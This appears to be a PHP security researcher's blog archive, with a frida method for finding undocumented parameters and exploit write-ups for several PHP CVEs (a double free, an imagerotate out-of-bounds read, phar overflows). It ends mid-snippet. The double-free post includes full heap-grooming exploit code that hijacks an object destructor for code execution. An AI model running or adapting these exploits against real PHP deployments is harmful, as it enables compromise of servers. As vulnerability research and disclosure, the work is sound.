Blog

Hunting for hidden parameters within PHP built-in functions (using frida)

posted Feb 2, 2018, 12:13 AM by Emmanuel Law   [ updated Feb 2, 2018, 12:28 AM]

While I was working on PHP, I found some "hidden" parameters to PHP built-in functions, but I had been too busy (read: lazy) to write the methodology down. Hopefully this is of interest to others out there, even though it is pretty simple. It is also a good showcase of frida and how easy and powerful it is.

P/S: If you are looking for vulnerabilities, you can stop reading this post now. There is none.

Let's just dive straight into what I mean by "Hidden parameters". The image below shows the API for the built-in function intlcal_from_date_time : 




One can typically call it as follows:

intlcal_from_date_time("1pm")

Notice that the documented API only allows for 1 input. 

Or does it? 

There's actually a second, undocumented parameter that you can pass in to set its locale. For example, you can call it via:

intlcal_from_date_time("1pm", "zh-Hant-TW")

This returns an IntlCalendar object with its locale set to Chinese (Taiwan).

The question one might ask is, why is there an undocumented parameter? I've no idea. Could it just have been a lack of documentation updates? Maybe. Does it do anything really fancy? Not in this case. It just sets the locale.

However, these hidden parameters, or discrepancies in the documentation, do present additional attack surface, which is of interest to me for fuzzing.


So the question now is: how does one go about discovering these hidden parameters systematically?

To do that, one must understand how PHP parses function parameters internally within the Zend engine. When a call is made to a PHP function, the parameters are parsed and validated internally by the Zend engine's zend_parse_parameters.

In the case of intlcal_from_date_time(), let's look at the source code within intl/calendar/calendar_methods.cpp:

U_CFUNC PHP_FUNCTION(intlcal_from_date_time)
{
....
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "Z|s!",
			&zv_arg, &locale_str, &locale_str_len) == FAILURE) {

In the if statement above, zend_parse_parameters is called to parse and validate the inputs to intlcal_from_date_time(). They are validated against the pattern "Z|s!". Here's how to interpret the pattern:

Z: a required zval ($dateTime in this case)
| : anything after this is optional
s: an optional string (which is our hidden locale parameter in this case)
!: the preceding parameter may also be null
More information about the patterns can be found here 
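To make the comparison against the documentation concrete, here is a minimal Python sketch that counts the required and optional arguments described by a pattern. The function names are hypothetical, and it assumes the usual modifier characters of zend_parse_parameters ("|" starts the optional part, "/" and "!" modify the preceding parameter, "*" and "+" mark variadic arguments); every other character is treated as one parameter.

```python
# Characters that modify the preceding parameter and consume no argument.
MODIFIERS = {"/", "!"}
# Characters that mark a variable number of arguments.
VARIADIC = {"*", "+"}


def count_params(spec):
    """Return (required, optional, variadic) for a pattern such as "Z|s!"."""
    required = optional = 0
    variadic = False
    seen_pipe = False
    for ch in spec:
        if ch == "|":
            seen_pipe = True
        elif ch in MODIFIERS:
            continue
        elif ch in VARIADIC:
            variadic = True
        elif seen_pipe:
            optional += 1
        else:
            required += 1
    return required, optional, variadic


def has_hidden_params(spec, documented_max):
    """True if the pattern accepts more fixed arguments than documented."""
    required, optional, _ = count_params(spec)
    return required + optional > documented_max


print(count_params("Z|s!"))          # (1, 1, False)
print(has_hidden_params("Z|s!", 1))  # True
```

For intlcal_from_date_time the documentation lists one parameter while the pattern accepts two, so the function is flagged. Variadic patterns are reported separately rather than flagged, since the documentation normally lists them explicitly.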


So my methodology for discovering these hidden parameters systematically is as follows:
  1. Start up the PHP CLI binary
  2. Invoke a PHP built-in function
  3. Using frida, hook into zend_parse_parameters (and its related sister functions)
  4. Obtain the parameter pattern that is being validated against
  5. Compare it against the official documentation
  6. Rinse and repeat for every built-in function within PHP
Before anyone gets too excited: there are only a handful of functions with hidden parameters, and not all of them do anything interesting. I'll leave that as an exercise for the reader.

However, this methodology of hooking into zend_parse_parameters does allow me to identify and build a database of exactly what the Zend engine is looking for when calling a PHP built-in function. I've found this to be especially useful when fuzzing PHP, as the documentation often labels a parameter as "mixed", which can be quite ambiguous.

Let me end off with a simple snippet of my python + frida code to hook into zend_parse_parameters.


import frida

# Excerpt from a class: PHP_BIN is the path to the PHP CLI binary and
# self.cmdstr is the PHP code that invokes the built-in function under test.
pid = frida.spawn([PHP_BIN, "-r", self.cmdstr])
session = frida.attach(pid)
script = session.create_script("""
    Interceptor.attach(ptr(Module.findExportByName(null, "zend_parse_parameters")), {
        onEnter: function(args) {
            // args[1] points to the parameter pattern string
            send(Memory.readCString(args[1]));
        }
    });
""")
script.on('message', self.on_message)
script.load()
frida.resume(pid)

def on_message(self, message, data):
    # The parameter pattern will be stored within message['payload']
    # Validate that against the official PHP documentation
    pass



Double Free in Standard PHP Library Double Link List [CVE-2016-3132]

posted Apr 13, 2016, 5:45 PM by Emmanuel Law   [ updated Feb 1, 2018, 9:01 PM]

I found a double free vulnerability in the Standard PHP Library (SPL). While writing the exploit, I couldn't find many write-ups on how PHP manages its heap internally. Through this blog post I'll shed some light on this topic, as well as on my approach to exploiting a double-free vulnerability like this within PHP.

Root Cause Analysis

The vulnerability is in SplDoublyLinkedList::offsetSet ( mixed $index , mixed $newval ) when passing in an invalid index. For example:

<?php
$var_1=new SplStack();
$var_1->offsetSet(100,new DateTime('2000-01-01')); //DateTime will be double-freed

When an invalid index (100 in this case) is passed into the function, the DateTime object is being freed for the first time in line 833:

 832                 if (index < 0 || index >= intern->llist->count) {
 833                         zval_ptr_dtor(value);
 834                         zend_throw_exception(spl_ce_OutOfRangeException, "Offset invalid or out of range", 0);
 835                         return;
 836                 }

The second free occurs in Zend/zend_vm_execute.h:855 when it cleans up the call stack:

 854                 EG(current_execute_data) = call->prev_execute_data;
 855                 zend_vm_stack_free_args(call);


PHP Internal Heap Management

Internally within PHP, heap allocations made via calls such as emalloc() fall into 3 categories depending on their size:
Small heap allocation (< 3072 bytes)
Large heap allocation (< 2 megabytes)
Huge heap allocation (> 2 megabytes)

Let's explore the small heap allocation/deallocation since that's what we are going to be using in this exploit. When dealing with memory handled by the small heap allocator, each chunk of memory is categorised into "bins" based on its size. For example:

  • Bin #1 : contains chunk sizes from 1 - 8 bytes
  • Bin #2:  contains chunk sizes from 9 - 16 bytes
  • Bin #3:  contains chunk sizes from 17 - 24 bytes
  • Bin #YouGetTheIdea....
When a memory chunk is freed internally within PHP via calls such as efree(), and the chunk in question is handled by the small heap allocator, PHP does not release it back to the OS. Instead, it caches the chunk and places it into the appropriate "bin". This bin is implemented as a singly linked list, with freed chunks of memory chained together.
The first few bytes of each freed chunk can be considered its header, which contains a pointer to the next freed chunk. Visually, this is what it looks like in memory:
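The same idea can be sketched as a toy model in Python. The size-class table below is an assumption taken from PHP 7's zend_alloc_sizes.h (the first bins grow in 8-byte steps, later ones in larger steps), and the Bin class is a hypothetical simplification that only tracks the "next" pointer kept in each freed chunk's header.

```python
# Small-allocation size classes, assumed from PHP 7's zend_alloc_sizes.h.
BIN_SIZES = [8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128,
             160, 192, 224, 256, 320, 384, 448, 512, 640, 768, 896, 1024,
             1280, 1536, 1792, 2048, 2560, 3072]


def bin_number(size):
    """Return the 1-based bin number that serves a request of `size` bytes."""
    for number, capacity in enumerate(BIN_SIZES, start=1):
        if size <= capacity:
            return number
    raise ValueError("not a small allocation")


class Bin:
    """Toy free list: each freed chunk stores the address of the next one."""

    def __init__(self):
        self.head = None    # address of the first free chunk
        self.next_ptr = {}  # address -> "header" of a freed chunk

    def free(self, addr):
        # The freed chunk's header points at the previous head of the list.
        self.next_ptr[addr] = self.head
        self.head = addr

    def alloc(self):
        # Hand out the head chunk and follow its header to the next one.
        addr = self.head
        self.head = self.next_ptr.pop(addr)
        return addr


print(bin_number(8), bin_number(9), bin_number(24))  # 1 2 3
print(bin_number(0x78))                              # 12

b = Bin()
b.free(0x1000)
b.free(0x2000)
print(hex(b.alloc()), hex(b.alloc()))  # 0x2000 0x1000
```

The last line shows the last-in, first-out behaviour: the most recently freed chunk is the first one handed out again, which is what the heap massaging later in this post relies on.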

Exploitation

Step 0: Evaluate if this is feasibly exploitable. This vulnerability is triggered by trying to insert an object into an invalid SplDoublyLinkedList index. This triggers a fatal error as such:

Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range

Upon the fatal error, PHP exits immediately. This prevents us from running any code in "userland" after the double free. Thus, in order to exploit this vulnerability, we need to trap the error so that PHP does not exit immediately after the double free. This can be done via set_exception_handler().

Step 1: We need to decide which object we want to trigger the double free on. I have chosen SplFixedArray for the following reasons:
  • SplFixedArray is small enough to be managed by the small heap allocator
  • Its size is not commonly used by PHP internals, so there is less interference. In this case the size of SplFixedArray is 0x78, which fits into Bin #12.
  • SplFixedArray is represented as a struct internally, and there's a member at a particular offset that is useful for exploitation. I'll talk more about this in step 3.
Step 2: We need to do some heap massaging. First let's do some cleaning up and use up any free chunks of memory in the bin associated with SplFixedArray's size. We can do that by allocating many instances of the object. This also ensures that the SplFixedArrays allocated are in a contiguous chunk of memory:

1 for ($x=0;$x<100;$x++){
2 $z[$x]=new SplFixedArray(5);
3 }
4 
5 unset($z[50]);

On line 5 above, we free the 50th SplFixedArray. This creates a hole in the contiguous chunk of memory allocated and can be visualized as:


We immediately allocate a new SplFixedArray (which causes it to occupy the 50th slot) and trigger the double free vulnerability on it:

<?php
$var_1=new SplStack();
$var_1->offsetSet(100,new SplFixedArray);

The reason for all this heap manipulation is to ensure that the double free is triggered on a location that is part of my controlled contiguous chunk of memory. This gives me relatively good control of the memory layout, as well as references to its neighboring chunks of memory (the 49th and 51st SplFixedArray).

After the first free, this is what the memory looks like:


After the 2nd free, this is what the memory looks like:





Step 3: Let's now exploit this abnormality in the heap. Notice that there's only 1 free chunk of memory? However, the linked list now has two arrows which point to the same chunk of memory. At this point, the heap is corrupted and PHP thinks there are 2 free chunks of memory when there's only 1.

This means that we can allocate 2 chunks (from Bin #12) and they will occupy the same memory space:

1 <?php
2 $s=str_repeat('C',0x48);
3 $t=new mySpecialSplFixedArray(5);
4 
5 class mySpecialSplFixedArray extends SplFixedArray{
6    public function offsetUnset($offset) {
7          parent::offsetUnset($offset);
8     }
9 }

In the code above we allocate a string (line 2) and a mySpecialSplFixedArray object (line 3), which will both occupy the same space between the 49th SplFixedArray and the 51st SplFixedArray.
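Why two allocations end up on top of each other can be shown with a toy free list in Python. This is a simplified sketch and not PHP's allocator: the FreeList class and the address are hypothetical, and unlike the real heap the model does not overwrite the chunk header when the chunk is handed out.

```python
class FreeList:
    """Toy model of one bin: a LIFO list threaded through the freed chunks."""

    def __init__(self):
        self.head = None
        self.memory = {}  # chunk address -> value stored in its first 8 bytes

    def free(self, addr):
        # The freed chunk's header is set to the old head of the list.
        self.memory[addr] = self.head
        self.head = addr

    def alloc(self):
        # Return the head chunk and follow its header to the next free chunk.
        addr = self.head
        self.head = self.memory[addr]
        return addr


bin12 = FreeList()
slot = 0x7F0000001C20    # hypothetical address of the slot between #49 and #51

bin12.free(slot)         # first free (zval_ptr_dtor in offsetSet)
bin12.free(slot)         # second free (call stack cleanup)

s_addr = bin12.alloc()   # stands in for the string $s
t_addr = bin12.alloc()   # stands in for the object $t
print(s_addr == t_addr)  # True
```

After the second free, the chunk's header points back at the chunk itself, so the allocator keeps handing out the same address.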


Notice that in line 3 I allocated mySpecialSplFixedArray, which is just an extended class of SplFixedArray but with the offsetUnset method overridden. To understand why, let's take a look at the PHP internal structure of a string vs SplFixedArray:


  • When we first allocate the string via $s=str_repeat('C',0x48), zend_string.len will have the value of 0x48
  • Next, if we were to allocate a new SplFixedArray(), fptr_offset_set would have the value 0 by default. Since this occupies the same memory space as the string previously allocated, it would set zend_string.len = 0
  • However, by extending the SplFixedArray class and overriding offsetUnset(), fptr_offset_set will contain the address of the user-defined function somewhere in memory. This address is definitely going to be larger than 0x48. Since fptr_offset_set overwrites zend_string.len (they share the same memory space), PHP now thinks that we have a much larger string than we originally allocated (in reality it was only ever allocated the space between the 49th and 51st SplFixedArray).

Step 4: Gaining Code execution. At this point:
  • PHP now thinks that $s is a very large string, and thus we can now read/write into and beyond the 51st SplFixedArray.
  • $t is our mySpecialSplFixedArray object, which shares the same address space as $s.
Assuming I want to execute code at 0xdeadbeef, here's the approach I'll take:
  1. Create a fake handler structure with a destructor that points to 0xdeadbeef
  2. Overwrite the mySpecialSplFixedArray handler pointer to point to our fake handler structure
  3. unset(mySpecialSplFixedArray), which will call the destructor on our object. Since the object now points to our fake handler structure, code will be executed wherever our destructor is pointing.

Achieving (1) is easy because we can write into the 51st SplFixedArray and store our fake handler structure there. Achieving (2) is also easy because $s and mySpecialSplFixedArray share the same memory space.
The tricky part is that when we create the fake handler structure, we do not know its exact address. Without knowing the address, we can't point mySpecialSplFixedArray to our fake handler structure.

The solution is to free the 51st and 52nd SplFixedArray:
Due to this free, the first 8 bytes of the 51st SplFixedArray chunk now point to the 52nd SplFixedArray memory chunk. By using $s to read the first 8 bytes of the 51st SplFixedArray, one can figure out the exact memory address that one is at.


Here's the exploit code in its full glory:


<?php
// #######   HELPER Function ##############
function read_ptr(&$mystring,$index=0,$little_endian=1){
    return hexdec(dechex(ord($mystring[$index+7])) .
                  dechex(ord($mystring[$index+6])) .
                  dechex(ord($mystring[$index+5])) .
                  dechex(ord($mystring[$index+4])) .
                  dechex(ord($mystring[$index+3])) .
                  dechex(ord($mystring[$index+2])) .
                  dechex(ord($mystring[$index+1])) .
                  dechex(ord($mystring[$index+0])));
}

function write_ptr(&$mystring,$value,$index=0,$little_endian=1){
    //$value=dechex($value);
    $mystring[$index]=chr($value&0xFF);
    $mystring[$index+1]=chr(($value>>8)&0xFF);
    $mystring[$index+2]=chr(($value>>16)&0xFF);
    $mystring[$index+3]=chr(($value>>24)&0xFF);
    $mystring[$index+4]=chr(($value>>32)&0xFF);
    $mystring[$index+5]=chr(($value>>40)&0xFF);
    $mystring[$index+6]=chr(($value>>48)&0xFF);
    $mystring[$index+7]=chr(($value>>56)&0xFF);
}

// ####### Exploit Start #######
class SplFixedArray2 extends SplFixedArray{
    public function offsetSet($offset, $value) {}
    public function Count() {echo "!!!!######!#!#!#COUNT##!#!#!#!#";}
    public function offsetUnset($offset) {
        parent::offsetUnset($offset);
    }
}

function exception_handler($exception) {
    global $z;
    $s=str_repeat('C',0x48);
    $t=new SplFixedArray2(5);
    $t[0]='Z';

    unset($z[22]);
    unset($z[21]);

    $heap_addr=read_ptr($s,0x58);
    print "Leak Heap memory location: 0x" . dechex($heap_addr) . "\n";
    $heap_addr_of_fake_handler=$heap_addr-0x70-0x70+0x18+0x300;
    print "Heap address of fake handler 0x" . dechex($heap_addr_of_fake_handler) . "\n";

    //Set Handlers
    write_ptr($s,$heap_addr_of_fake_handler,0x40);

    //Set fake handler
    write_ptr($s,0x40,0x300); //handler.offset
    write_ptr($s,0x4141414141414141,0x308); //handler.free_obj
    write_ptr($s,0xdeadbeef,0x310); //handler.dtor.obj

    str_repeat('z',5);
    unset($t);  //BOOM!
}

set_exception_handler('exception_handler');

$var_1=new SplStack();
$z=array();

//Heap management
for ($x=0;$x<100;$x++){
    $z[$x]=new SplFixedArray(5);
}
unset($z[20]);

$var_1->offsetSet(0,new SplFixedArray);
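The two helpers do nothing more than read and write a 64-bit little-endian pointer inside a byte string. As a language-neutral illustration, here is a small Python sketch of the same operation using the standard struct module. The third function is a hypothetical variant that rebuilds the value by concatenating per-byte hex strings, to show that this approach only round-trips when each byte is zero-padded to two digits.

```python
import struct


def read_ptr(buf, index=0):
    """Read a 64-bit little-endian pointer from buf at byte offset index."""
    return struct.unpack_from("<Q", buf, index)[0]


def write_ptr(buf, value, index=0):
    """Write value as a 64-bit little-endian pointer into buf at index."""
    struct.pack_into("<Q", buf, index, value)


def read_ptr_hex_concat(buf, index=0, pad=True):
    """Rebuild the pointer by concatenating per-byte hex strings."""
    fmt = "{:02x}" if pad else "{:x}"
    # Most significant byte first, i.e. offsets index+7 down to index+0.
    digits = "".join(fmt.format(buf[index + i]) for i in range(7, -1, -1))
    return int(digits, 16)


buf = bytearray(16)
write_ptr(buf, 0x00007F0A0B0C0D0E, 8)
print(hex(read_ptr(buf, 8)))                        # 0x7f0a0b0c0d0e
print(hex(read_ptr_hex_concat(buf, 8, pad=True)))   # 0x7f0a0b0c0d0e
print(hex(read_ptr_hex_concat(buf, 8, pad=False)))  # 0x7fabcde
```

Without padding, any byte below 0x10 contributes a single hex digit and the reconstructed address comes out wrong, which is worth keeping in mind when a leaked pointer looks implausible.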

Original bug report can be found here

Exploiting CVE-2016-1903: Memory Read via gdImageRotateInterpolated

posted Feb 10, 2016, 5:13 PM by Emmanuel Law   [ updated Feb 15, 2016, 6:23 PM]

Vulnerability Background

This isn’t a vulnerability with a large impact, but it’s one that I thoroughly enjoyed exploiting. Hence this blogpost.
The issue is in the PHP function imagerotate() :

 Resource imagerotate ( resource $image , float $angle , int $bgd_color)


The function takes in an $image, rotates it by $angle degrees and fills any empty space left over as a side-effect of the rotation with $bgd_color.

$image can be a palette-based image or a true color image. In the case of a palette-based image, $bgd_color is an index into the image's color palette.

Here’s an example of how the function is used in practice:

<?php
//Create square image of 100 * 100
$mypic=imagecreate(100,100);

//Allocate 3 colors into the PALETTE
imagecolorallocate($mypic,0xFF,0,0); //Red @ PALETTE[0]
imagecolorallocate($mypic,0,0,0xFF); //Blue @ PALETTE[1]
imagecolorallocate($mypic,0,0xFF,0); //Green @ PALETTE[2]

//Fill the square with PALETTE[2] (Green)
imagefill($mypic,0,0,2);

//Rotate the image by 45 degrees and fill empty space with the color at PALETTE[1] (Blue)
$mypic2=imagerotate($mypic,45,1);

The code creates an image as follows:



The crux of the vulnerability is in the function's handling of the $bgd_color parameter to imagerotate(), which is an index into the color palette. Looking at the PHP code, we can see that the palette is stored within the image's gdImageStruct structure as red, green, blue and alpha arrays:

typedef struct gdImageStruct {
	/* Palette-based image pixels */
	unsigned char **pixels;
	int sx;
	int sy;
	/* These are valid in palette images only. See also
	   'alpha', which appears later in the structure to
	   preserve binary backwards compatibility */
	int colorsTotal;
	int red[gdMaxColors];
	int green[gdMaxColors];
	int blue[gdMaxColors];
	int open[gdMaxColors];
......................
	int alpha[gdMaxColors];


The size of each array is gdMaxColors, defined elsewhere as 256. The function does not check that the passed-in $bgd_color falls within these arrays' valid range of 0 - 255, potentially resulting in an out-of-bounds lookup into the arrays. Thus, if we run the following code, where $bgd_color is a large number (0x6667), we get the following image:


$mypic2=imagerotate($mypic,45,0x6667);




Notice the maroon color in the background? The color came from the undefined memory located at red[0x6667], blue[0x6667], green[0x6667] and alpha[0x6667].

By "deciphering" the background color, we can attempt to determine the bytes that were at that memory location, allowing us to perform an arbitrary memory read!


Exploiting the Vulnerability to Read Memory

Here's a high-level visualization of what the image's color palette looks like in memory:

Here's how PHP computes the background color using the RGBA word-order convention:

#define gdTrueColorAlpha(r, g, b, a) (((a) << 24) + \
			((r) << 16) + \
			((g) << 8) +  \
			(b))

Thus given a background color, we can obtain the underlying bytes of memory that were at that color’s memory location by:
  • Step 1: Breaking up the color into the individual RGB and alpha components. Each component leaks one of the bytes in the memory location
  • Step 2: Repeating step 1 over the out-of-range palette indices that correspond to the memory we want to read, e.g. imagerotate($mypic,45, 256....)
  • Step 3: Reconstituting the pieces of memory leaked in steps 1 and 2 into contiguous chunks.

Step 1 should be easy, right? Looking at the PHP code above, breaking a color back into its RGB and alpha components should be as easy as a couple of bit shifts here and a couple of bit shifts there. Apparently not! This is where it gets tricky (and fun)! There are a couple of issues:


Issue 1: PHP's RGBA internal representation 
By convention, each RGBA component is typically represented by a single byte. For example, this color with 50% opacity is represented as 0x80FF9000 (ARGB convention) where:
  • 0x80 = Alpha (50% opacity)
  • 0xFF = RED
  • 0x90 = Green
  • 0x00 = Blue
If PHP  had used this typical convention of 1 byte per component, reversing a background color back into the underlying memory would be extremely trivial. Instead, PHP stores each RGBA component as 32-bit Integers (4 bytes), despite only requiring 1 byte! Thus, this is a more accurate high level visualization of a PHP image's color palette, shown when computing the background color at index x:

Since PHP uses 4 bytes per color component, the formula to calculate the background color can be  better visualized as:

This implies that given a single background color, it is only possible to obtain the first byte of red[x] from the least significant byte of the background color. The other bytes (MSB to 2nd LSB) of the background color are a "tangle" of the other color components and appear to be impossible to separate.
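The overlap is easy to see with a small Python model of the macro. This is a sketch under the assumption that the C arithmetic wraps at 32 bits; the component values in the second example are made up to stand in for leaked memory.

```python
MASK32 = 0xFFFFFFFF


def gd_true_color_alpha(r, g, b, a):
    """Model of the gdTrueColorAlpha macro on 32-bit ints (wrapping)."""
    return ((a << 24) + (r << 16) + (g << 8) + b) & MASK32


def split_bytes(color):
    """Return the four bytes of a 32-bit color, most significant first."""
    return [(color >> shift) & 0xFF for shift in (24, 16, 8, 0)]


# One byte per component: every byte of the result is exactly one component.
print(split_bytes(gd_true_color_alpha(0xFF, 0x90, 0x00, 0x80)))
# [128, 255, 144, 0]

# Four bytes per component (hypothetical leaked values): the bytes overlap.
r, g, b, a = 0x11223344, 0x55667788, 0x99AABBCC, 0x01020304
color = gd_true_color_alpha(r, g, b, a)

# Only the lowest byte comes from a single term (the unshifted one).
print((color & 0xFF) == (b & 0xFF))  # True

# The next byte is already a sum of bytes from two different terms.
print(((color >> 8) & 0xFF) == (((b >> 8) + g) & 0xFF))  # True
```

Each higher byte of the result mixes in one more term, which is why a single background color is not enough and several of them have to be correlated.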

The trick is to correlate a whole bunch of background colors. For example, given a background color computed from palette[x], we will know the LSB of Red[X]. This is denoted by ! in cell AX[1st Byte]: 




Now what if we increase the palette index by 256 and compute the background from index x+256? This will give us BX[1st Byte] (This is the LSB of RED[X]). Since we now know BX[1st Byte], we can infer AX[2nd Byte] because background color Palette[X][2ndByte]= AX[2nd Byte] + BX[1st Byte] :




If we advance another 256 indices and compute the background from index x+512, we can infer even more bytes:

This is how we can work around PHP using 32-bit integers for each RGBA component and infer the original bytes in out-of-range memory. The only other tricky thing to take note of when inferring the bytes is to consider potential carry bits.




Issue 2: PHP converts the palette-based image to a true color image after rotation

The vulnerability is triggered by imagerotate() and the vulnerable path is only taken when the image is a palette-based image. This is how the code is implemented in PHP:


 1 gdImagePtr gdImageRotateInterpolated(const gdImagePtr src, const float angle, int bgcolor)
 2 {
 3 ......
 4 	if (src->trueColor == 0) {
 5 		if (bgcolor >= 0) {
 6 			//Vulnerable line:
 7 			bgcolor =  gdTrueColorAlpha(src->red[bgcolor], src->green[bgcolor], src->blue[bgcolor], src->alpha[bgcolor]);
 8 		}
 9 		gdImagePaletteToTrueColor(src); //convert to true color
10 	}



Notice the following:
  • Line 4: Checks that the image is palette-based
  • Line 7: The vulnerable code with the out-of-bounds array index
  • Line 9: Converts the image from palette-based to true color
The implication of line 9 is that for each image, you can only trigger the vulnerable code once before it is converted to true color. You might ask, why can't we just generate a bunch of different images and trigger the vulnerable code once on each image? This is because each image gets allocated in a different part of the PHP heap, meaning that it would be virtually impossible to read from the same contiguous out-of-range memory using the above technique.

To solve this issue, here is my pseudo code:
  1. Call CreateImage()
  2. Trigger the vulnerability on the image to extract some bytes from the background color. After this, the image is converted into true color and the vulnerability can't be triggered on that same image anymore.
  3. Call imagedestroy(). This destroys the image and frees the memory back into the PHP Zend Memory Manager cache
  4. Immediately invoke CreateImage() again. This creates a new image. The PHP Zend Memory Manager will allocate the image from the same memory that was freed into its cache in step 3. Since this is a new image, it's created as a palette-based image.
  5. We can now trigger the vulnerability on the image again.
  6. Rinse and repeat for the entire out-of-range memory that you want to read

Issue 3: Alpha array is at a weird offset
Notice that the arrays for red, green and blue are all contiguous? Not so for the alpha array. It is at an offset, which makes things a pain. This is something that has to be considered when writing the exploit.


Original bug report can be found here.

Here's my POC to read contiguous chunks of memory. It outputs memory like so:


CVE-2015-3329: POC for buffer overflow in PHP phar_set_inode

posted Apr 18, 2015, 7:04 AM by Emmanuel Law

Background

PHP has the built-in Phar & PharData functionality since 5.3.0. These are used to manipulate the following archive types: tar,zip & phar. I found this vulnerability through fuzzing.


Technical Detail


This is a standard BOF in phar_set_inode() @ phar_internal.h:

static inline void phar_set_inode(phar_entry_info *entry TSRMLS_DC) /* {{{ */
{
	char tmp[MAXPATHLEN];
	int tmp_len;

	tmp_len = entry->filename_len + entry->phar->fname_len;
	memcpy(tmp, entry->phar->fname, entry->phar->fname_len);
	memcpy(tmp + entry->phar->fname_len, entry->filename, entry->filename_len);
	entry->inode = (unsigned short)zend_get_hash_value(tmp, tmp_len);
}

The vulnerability occurs because the code does not check that tmp_len is < MAXPATHLEN. On my x64 Ubuntu, MAXPATHLEN = 0x1000.

Exploiting the vulnerability is trivial since the attacker controls entry->filename and entry->filename_len. The only thing to note is that tmp_len sits below tmp[] on the stack, so the overflow also overwrites tmp_len. The value it is overwritten with needs to be within reasonable limits, otherwise PHP would crash when zend_get_hash_value() is called.


There are multiple pathways to trigger this:
  • Parsing Tar
  • Parsing Zip
  • Parsing Phar
I've found that the easiest (read: boring) way to trigger it was via ZIP. The more interesting path would be via Tar for the following reasons:

  • The Tar header has a CRC check which makes it a slight pain during exploit development. However it can be bypassed because of this:
 102 int phar_is_tar(char *buf, char *fname) /* {{{ */
 103 {
 115 ......
 116 	ret = (checksum == phar_tar_checksum(buf, 512));
 117 .....
 118 	if (!ret && strstr(fname, ".tar")) {
     		/* probably a corrupted tar - so we will pretend it is one */
     		return 1;
     	}
     }


Even though it validates the checksum (line 116), as long as the file name contains .tar (line 118), it always passes the validation. Cheers PHP for being so lenient ;)

  • When exploiting a Zip, all you need is a single entry with a long fname_len. Not so for Tar, because of code like the following in tar.c, where entry.filename_len is limited to 256 (line 411), which is not enough to overflow the return address.
 394 char name[256];
 395 int i, j;
 396 
 397 for (i = 0; i < 155; i++) {
 398 	name[i] = hdr->prefix[i];
 399 	if (name[i] == '\0') {
 400 		break;
 401 	}
 402 }
 403 name[i++] = '/';
 404 for (j = 0; j < 100; j++) {
 405 	name[i+j] = hdr->name[j];
 406 	if (name[i+j] == '\0') {
 407 		break;
 408 	}
 409 }
 410 
 411 entry.filename_len = i+j;
  • However, by analysing the code path, it is still exploitable through the use of 2 tar entries (aka file header blocks):
    • First a Longlink entry (EG: typeflag='L') to prep entry.filename_len to a large value. 
    • Followed by a traditional normal file entry
  • The best part of doing it this way is that you don't need to worry about entry check sums as it's done only on the 2nd entry. You can just grab it from any existing tar file and use it verbatim without having to calculate any checksum.
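The 256-byte limit on the normal code path can be checked with a direct Python transliteration of the two loops quoted from tar.c. This is a sketch for illustration only; the function name is hypothetical and the inputs stand in for the prefix and name header fields.

```python
def tar_filename_len(prefix, name):
    """Mirror the prefix/name joining loops quoted above from tar.c."""
    buf = bytearray(256)
    i = 0
    while i < 155:
        buf[i] = prefix[i]
        if buf[i] == 0:
            break
        i += 1
    buf[i] = ord("/")
    i += 1
    j = 0
    while j < 100:
        buf[i + j] = name[j]
        if buf[i + j] == 0:
            break
        j += 1
    return i + j


# Ordinary NUL-terminated fields: "dir" + "/" + "f".
print(tar_filename_len(b"dir\x00", b"f\x00"))    # 5

# Header fields with no NUL terminator at all: the longest possible result.
print(tar_filename_len(b"A" * 155, b"B" * 100))  # 256
```

With MAXPATHLEN at 0x1000, a filename_len of at most 256 from this path is far too short on its own, which is why the Longlink entry is needed to set a larger value first.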
POC for exploits can be downloaded here. Written for:
  • x64 ubuntu
  • ./configure --enable-debug --enable-zip

Bug report can be found here

CVE-2015-2783: Exploiting Buffer Over-read in Php's Phar

posted Apr 15, 2015, 9:24 PM by Emmanuel Law   [ updated Jun 1, 2015, 8:39 PM]

Background

The Phar extension is built into PHP > 5.3.0. It allows developers to manipulate the following archives: tar, zip, phar.

I found this vulnerability while I was assessing the security of the phar extension. When parsing a phar file, it is possible to trigger a buffer over-read condition and leak memory information. This vulnerability is interesting because exploiting it is not simply a matter of controlling the read size.

Affected versions are PHP < 5.6.8RC1

Technical Details
Phar file metadata is stored in PHP's serialized format. When processing a phar file, PHP attempts to unserialize the metadata in phar.c:

 623 if (!php_var_unserialize(metadata, &p, p + buf_len, &var_hash TSRMLS_CC)) {


  • p points to the start of serialized metadata in the file buffer. 
  • p + buf_len points to the end
  • buf_len is a field specified in the phar file and user controllable

php_var_unserialize() is the same function that is called when unserialize() is invoked in PHP "user-land".

Within php_var_unserialize() there is a sanity check to ensure that p does not go beyond p + buf_len:

 461 PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER) //zval **rval, const unsigned char **p, const unsigned char *max, php_unserialize_data_t *var_hash TSRMLS_DC
     {
     ...
 469 	if (YYCURSOR >= YYLIMIT) {
 470 		return 0;
 471 	}
     .....
 892 yy48:
 893 	++YYCURSOR;
 894 	if ((YYLIMIT - YYCURSOR) < 2) YYFILL(2);
 895 	yych = *YYCURSOR;
 896 	if (yych <= '/') goto yy18;
 897 	if (yych <= '9') goto yy48;
 898 	if (yych >= ';') goto yy18;
 899 	yych = *++YYCURSOR;
 900 	if (yych != '"') goto yy18;
 901 	++YYCURSOR;
 902 	{
 903 	size_t len, maxlen;
 904 	char *str;
 905 
 906 	len = parse_uiv(start + 2);
 907 	maxlen = max - YYCURSOR;
 908 	if (maxlen < len) {
 909 		*p = start + 2;
 910 		return 0;
 911 	}

  • Line 469 checks that p does not go beyond p + buf_len
  • Line 894 looks like it's sanity checking as well, but this is just template code left over by re2c when generating the var_unserializer.c file. It is typically used by the regex library to fill up the data buffer when it's getting low. However, in PHP's case, php_var_unserialize will always have the full serialized data in the buffer from the very beginning. Thus YYFILL is just a while(0) loop that does nothing. It's interesting to note that the compiler actually optimized this line of code out. In essence, this line of code never gets executed.
  • There's another sanity check at line 908 to ensure the length of the data doesn't go beyond p + buf_len

When we start unserializing a string in the format s:<len>:"<Data>", lines 890-900 are essentially a loop to extract <len>. As long as the next character is a digit, it keeps looping even if YYCURSOR goes beyond p + buf_len.

When YYCURSOR goes beyond max (aka p + buf_len or YYLIMIT), it results in an integer underflow on line 907. Thus the sanity check on line 908 will always pass.
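The underflow can be reproduced with plain integer arithmetic. The following Python sketch models lines 907 and 908 under the assumption of a 64-bit size_t; the function name and the addresses are hypothetical.

```python
SIZE_T_MASK = (1 << 64) - 1  # assumption: size_t is 64 bits wide


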